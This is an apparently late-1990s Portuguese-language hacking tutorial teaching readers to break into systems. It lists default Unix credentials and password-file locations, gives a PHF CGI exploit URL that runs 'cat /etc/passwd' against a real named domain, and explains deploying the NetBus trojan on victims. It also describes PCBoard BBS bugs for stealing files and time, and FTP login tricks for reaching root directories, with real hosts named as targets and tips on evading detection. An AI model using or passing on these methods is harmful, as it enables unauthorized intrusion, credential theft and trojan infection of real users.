Aprenda a Invadir, mas cuidado, você pode se complicar...
Invasão Em Sistema Unix
Para entrar no sistema UNIX, você deve entrar com um
"login", que pode ter de 1 a 8 dígitos e um password que pode ter de 6 a 8
dígitos. Dai você tem duas saídas:
1.Arrumar a lista de passwords com um hacker
2.Tentar entrar com os defaults do UNIX
3.Ver quem está on-line com os comandos: who,
rwho, finger; e tentar entrar com seus logins mais tarde.
Obs: Defaults do UNIX são logins e passwords que já vem com o sistema. Eles ficam residentes até que o sysop o desliguem, então você pode dar a sorte de encontrar um esquecido. Veja lista abaixo.
| Login: | Password: |
| root | root |
| root | system |
| sys | sys |
| sys | system |
| daemon | daemon |
| uucp | uucp |
| tty | tty |
| test | test |
| unix | unix |
| unix | test |
| bin | bin |
| adm | adm |
| adm | admin |
| admin | adm |
| admin | admin |
| sysman | sysman |
| sysman | sys |
| sysman | system |
| sysadmin | sysadmin |
| sysadmin | sys |
| sysadmin | system |
| sysadmin | admin |
| sysadmin | adm |
| who | who |
| learn | learn |
| uuhost | uuhost |
| guest | guest |
| host | host |
| nuucp | nuucp |
| rje | rje |
| games | games |
| games | player |
| sysop | sysop |
| root | sysop |
| demo | demo |
Dentro do sistema, a primeira coisa que você deve fazer é copiar o arquivo da lista de passwords. Ele se está em: /etc/passwd. Mas alguns tipos de UNIX guardam a lista de passwords em outro lugar, veja a lista abaixo:
UNIX: |
DIRETÓRIO: |
| AIX 3 | /etc/security/passwd /tcb/auth/files// |
| A/UX 3.Os | /tcb/files/auth/? |
| BSD4.3-Reno | /etc/master.passwd |
| ConvexOS 10 | /etc/shadpw |
| Convex0S 11 | /etc/shadow |
| DG/UX | /etc/tcb/aa/user |
| EP/IX | /etc/shadow |
| HP-UX | /.secure/etc/passwd |
| IRIX 5 | /etc/shadow |
| Linux 1.1 | /etc/shadow |
| OSF/1 | /etc/passwd[.dir|.pag] |
| SCO Unix #.2.x | /tcb/auth/files/ |
| SunOS 4.1+c2 | /etc/security/passwd.adjunct |
| SunOS 5.0 | /etc/shadow |
| System V 4.0 | /etc/shadow |
| System V 4.2 | /etc/security/database |
| Ultrix 4 | /etc/auth[.dir|.pag] |
| UNICOS | /etc/udb |
No arquivo de passwords, você vai encontrar as informações na seguinte sintaxe:
username:password:UserID:GroupID:descrição ou nome:homedir:shell
Ex.:ard:234abc56:7148:34:Rodrigo Ardilha:/home/dir/ard:/bin/ard
Username: ardilha
Encrypted Password: 234abc56
User Number: 7148
Group Number: 34
Other Information: Rodrigo Ardilha
Home Directory: /home/dir/ard
Shell: /bin/ard
Esse arquivo muito provavelmente estará encriptados. O password estará escondido e, sem um programa para desencriptá-la, a lista será inútil. Na seção Download tem alguns programas que desencriptar esses tipos de arquivos.
Antes de usar o programa desencriptador que não dá certeza de sucesso, tente encontrar um login sem password pois assim, você só precisará digitar o login para entrar no sistema. Ex.:
ard::7148:34:Rodrigo Ardilha:/home/dir/ard:/bin/ard
Depois da lista de passwords, pegue os seguintes arquivos:
/etc/group - É a lista de newsgroups e
seus passwords também encriptados.
sintaxe - groupname:password:group id:users in group
/etc/hosts - É a lista de hosts conectados ao sistemas. Útil quando a conexão é via telnet ou rlogin.
/usr/mail/<user name> - É onde estão guardadas as mensagens de cada usuário.
Invadindo com o NetBusS
Você já deve ter falado do tal de NetBus, então já sabe muito bem pra que ele serve... né? nao sabe? Bem o NetBus é um programa que "invadi" computadores conectados a internet através do IP... Bem, nao é Invadi a palavra certa e sim o computador da vitima te dá acesso por uma porta q fica aberta esperando com que o NetBus Client conecte... entao ele nao invadi, a vítima o deixa entrar... ok?
Bem, seu funcionamento é extremamente simples... Alias, os autores do NetBus... Meus Parabéns... isso que eu chamo de um programa hacker! Sinceramente... foi muito bem feito apesar do bugs faceis de solucionar... Parabens! Bem, voutando ao assunto: para voce invadir você deve primeiramente saber quem está com o NetBus Server executado no sistema... isso nao é muito dificil de saber... é só mandar o NetBus Client Scanear a porta que voce deseja e os o IP inicial e final... o resto e com ele... ele vai olhando IP por IP até ver um que está com a porta que você procura aberta... aí você conecta nele e... hehehe....
A versão 1.70 do NetBus foi adicionado novos propriedades... uma delas é que quando a vítima conecta o client recebe um e-mail... muito bom... e voce pode mudar a senha para conectar no server agora com apenas alguns cliques... muito bom!
Na seçao Download da Área Hacker você encontrará o pacote NetBus 1.70 que é a versão mais nova até o momento (03/12/98), contendo NetBus Server (que voce deve mandar pra vitima) e o NetBus Client (por esse programa você conecta na vítima).
Invasão Por Browser
O ataque via browser é um dos ataques mais fáceis de executar, mas não da nem 50% de sucessos nos ataques. Vou tentar explicar como você usa esse método:
Primeiramente você tem que entender o que está fazendo, não adianta selecionar a dica aperta CTRL+C e colocar no navegador achando que ele vai fazer tudo para você não, entenda:
Bom, como já sabe o geralmente o arquivo "passwd" é o que contém os passwords encripitados (se você não sabe ainda, dá um olhada na seção "SISTEMA UNIX"), existem vários servidores que só Root pode entrar no diretório "/etc", para outros usuários é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém um arquivos chamado PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer hackear.
Ex.: http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bom, mas se você usar um pouco a cabeça vai ver que para que não de nada errado e você pode usar o anonymizer (Se você não ainda o que é o anonymizer, dá uma olhada na seção Anônimo), bom não é certeza que dá pra usar não porque eu nunca tentei, mas pela lógica dá.
Ataque a BBS
Você como um bom usuário já deve ter entrado em um sistema de BBS's usando o fuleiro Hiper Terminal do Windows, quando você entrar pela primeira vez, eles escolhe acesso por alguns dias por uns 30 minutos diários, num é? Mas esse acesso não vale nada, você só tem permissão para entrar no diretório de arquivos livres e mandar mensagens para o Sysop, que num tá nem aí para você... o negocio dele é só com os usuários que já pagaram um taxa e são já assinantes da merda da BBS dele... Bom, contando com esse maltratos, e preços abusivos para tanta merda aí vai alguns bugs para "se acabar" em uma BBS:
# SyZTeM > PCBoard 15.x #
Caso você seja um novo usuário, ou seja, teu nível de acesso não permita
fazer praticamente nada, execute tal bug para que você possa pegar
file que esteja nos diretórios da bbs:
l - (filename) - (areaname) d - ns [ENTER]
Ex: L *.* 1 D NS
L: Procura por nome de arquivo.
*.*: todos arquivos.
1: Área.
D: Download dos arquivos.
NS: NonStop.
Pronto... Simples, não?
Para conseguir maior tempo de acesso:
Entre na área livre da bbs, marque qualquer file e faça o download.
Pule pro seu OS, e entre no dir. onde se localiza o file, logo após você devera usar um
programinha, cujo nome é "hexed.exe", onde ira editar tal file (não importa se
esteja compactado) e tira somente 1 byte. Volta novamente pro seu programa de
comunicação e puxe novamente o mesmo file pelo protocolo ZMODEM.
Agora... volte pro main menu da bendita bbs, e da uma olhadinha no teu tempo de acesso! :)
Falha na verificação de tempo ao marcar arquivos:
Descrição:
Se você marcar arquivos pela forma descrita acima, com o comando L,
você vai estar dizendo para o PCBoarD: "Olha sistema, quando eu for fazer download
você me manda estes arquivos...", ou seja.. eles não são marcados imediatamente..
Se você for dar download e faltar tempo para alguns arquivos,
simplesmente aborte o d/l com o comando a naquela linha: "Aborta, Continua, Goodbye,
Protocol.. assim".. e então volta para o menu e usa o mesmo comando.
Quando você for fazer d/l novamente os arquivos já marcados
aparecerão da seguinte forma:
"Duplicates file.." ou seja.. você tentou marcar duas vezes
o mesmo arquivo, certo? Acontece que o PCB não conta o tempo destes arquivos duplicados,
ou seja, ele vai marcar + xxx arquivos com o tempo restante. Por ex: se você tinha 60
minutos e usar este comando por umas 6 vezes, você pode fazer uma transferencia de 360
min.!! que beleeeeeeeeeza!!!!!
# SyZTeM > PCBoard & RA (aLL VeRSioN) #
Para conseguir roubar qualquer file do HD do SySoP , inclusive o
users.dat ou user.bbs (não lembro direito) da bbs!
Basta ter um programa de comunicação com o protocolo BiMODEM e o
sistema HOST também. Mas caso teu programa não tiver tal protocolo, basta instalar um...
não é difícil de achar!
Bom... você esta conectado na bbs, agora, faca o upload de qualquer arquivos. Durante a
transferencia (por protocolo BiMODEM) você terá a opção de fazer o download... pronto!
Puxe o users.dat do HD HOST, mas antes, você terá que descobrir em que diretório se
encontra tal arquivos.
Mas isto é fácil.. puxe o autoexec.bat dele, e verifique qual o board que ele esta carregando, e em que path esta localizado, consequentemente, você saberá onde esta o users.dat.
Ataque via FTP
Para Hackear um Servidor FTP, Primeiro você
deve saber o endereço do Host ou seu IP, para isto use o IPSCAN ou outro programa
qualquer de IP.
Lista de Alguns FTP's:
ftp.mandic.com.br
ftp.bestway.com.br
ftp.internetclub.com.br(HACKEADO)
ftp.netscape.com
ftp.angelfire.com
Existem vários Programas de FTP'S, no Windows vem um programa de FTP. Vá ao Prompt e
digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro Prompt (to),
digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br.
Ao conectar ele pedirá a senha e o Password, tente usar os passwords UNIX, aí vai os passwords do UNIX, se não der você deve tentar entrar INVISIVEL:
| Login: | Password: |
| root | root |
| root | system |
| sys | sys |
| sys | system |
| daemon | daemon |
| uucp | uucp |
| tty | tty |
| test | test |
| unix | unix |
| unix | test |
| bin | bin |
| adm | adm |
| adm | admin |
| admin | adm |
| admin | admin |
| sysman | sysman |
| sysman | sys |
| sysman | system |
| sysadmin | sysadmin |
| sysadmin | sys |
| sysadmin | system |
| sysadmin | admin |
| sysadmin | adm |
| who | who |
| learn | learn |
| uuhost | uuhost |
| guest | guest |
| host | host |
| nuucp | nuucp |
| rje | rje |
| games | games |
| games | player |
| sysop | sysop |
| root | sysop |
| demo | demo |
Para entrar Invisível:
No login pressione ENTER, no password pressione ENTER novamente...
Ira aparecer o prompt ftp> ai é só digitar:
quote user ftp , pressione ENTER e digite:
quote cwd ~root
Pressione ENTER novamente e digite:
quote pass ftp
Pronto, você esta Hackeando invisível...
Mas tem um porem..., se quando você entrar aparecer a mensagem: user restriction aplly,
você não esta Hackeando, pois esta aplicada a proteção... para isto tente com outro
USER tipo:
quote cwd ~sys e os outros da lista UNIX (acima)
ATENÇÃO!!!!
Não tente Hackear usando o user normal de FTP'S, que é login : anonymous e password: seu
E-Mail, pois vai ser aplicado a proteção.... Ao entrar você vai estar no diretório do
login, tipo \home\root\
Daí você entra no diretório /etc (cd etc) e pegue o arquivo PASSWD (get passwd), ele
contém as senhas doas usuários, estão todas criptografadas, mas existe programas com o
Jack que conseguem descriptografar através do método de comparação, o Jack pega uma
Worlist (arquivo palavras mais usadas como senha), criptografa ela com as
instruções do passwd e compara, os resultados são gravados em um arquivo (acho, ele
não roda no meu PC!).
O arquivo de senhas podem estar em vários diretórios, dependendo do tipo de UNIX, olhe a lista abaixo:
UNIX: |
Diretório: |
| AIX 3 | /etc/security/passwd /tcb/auth/files// |
| A/UX 3.Os | /tcb/files/auth/? |
| BSD4.3-Reno | /etc/master.passwd |
| ConvexOS 10 | /etc/shadpw |
| Convex0S 11 | /etc/shadow |
| DG/UX | /etc/tcb/aa/user |
| EP/IX | /etc/shadow |
| HP-UX | /.secure/etc/passwd |
| IRIX 5 | /etc/shadow |
| Linux 1.1 | /etc/shadow |
| OSF/1 | /etc/passwd[.dir|.pag] |
| SCO Unix #.2.x | /tcb/auth/files/ |
| SunOS 4.1+c2 | /etc/security/passwd.adjunct |
| SunOS 5.0 | /etc/shadow |
| System V 4.0 | /etc/shadow |
| System V 4.2 | /etc/security/database |
| Ultrix 4 | /etc/auth[.dir|.pag] |
| UNICOS | /etc/udb |
Bom... se você não sabe os comandos, ai vai a dica... Se você estiver no MS-DOS, digite ? e tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear.
Não fique mais que 5 Min em um servidor, pois ele
caçara seu IP, e seu login, e pode dá cadeia.
Não me responsabilizo por atos cometidos nos servidores... o problema é de quem Hackeia,
e não meu, tome muito cuidado, e NUNCA, mas NUNCA apague NADA...
Menu Principal